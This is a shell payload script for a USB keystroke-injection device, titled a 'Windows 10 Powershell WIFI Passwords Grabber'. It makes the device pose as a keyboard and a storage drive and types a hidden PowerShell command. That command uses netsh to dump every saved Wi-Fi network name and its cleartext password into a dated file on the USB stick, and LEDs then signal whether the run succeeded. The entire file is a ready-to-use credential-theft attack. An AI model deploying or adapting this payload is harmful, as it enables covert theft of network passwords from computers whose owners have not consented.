#!/bin/bash

LED GREEN FAST

SYNC_PAYLOADS # Make sure the payloads folder is in the usb-storage device that the target gets
ATTACKMODE STORAGE HID # Setup the gadgets so the PI presents itself as a HID and a storage device

# Name: Windows 10 Powershell WIFI Passwords Grabber
# Auther: Braineater
# Mad Props: Darren Kitchen for Volume Finder

QUACK GUI R
QUACK DELAY 200
QUACK STRING powershell -WindowStyle hidden
QUACK ENTER
QUACK DELAY 200
QUACK STRING $u=(gwmi win32_volume -f 'label=''BUNNY''').Name;cd $u.name
QUACK ENTER
QUACK DELAY 100
QUACK STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >WfiPasswords$(get-date -f yyyy-MM-dd).txt
QUACK ENTER
QUACK DELAY 100
QUACK STRING exit
QUACK ENTER

# Now we keep looking on the storage device if the target finished. We set a timeout of 120 seconds
WAIT_TARGET 120
exitCode=$?
if [ $exitCode -eq 0 ]; then
	# The target has written a file called target_finished in the root of the storage device. We are happy!
	LED RED OFF
	LED GREEN ON
else
	# We never heard from the target. Something went wrong!
	LED GREEN OFF
	LED RED FAST
fi
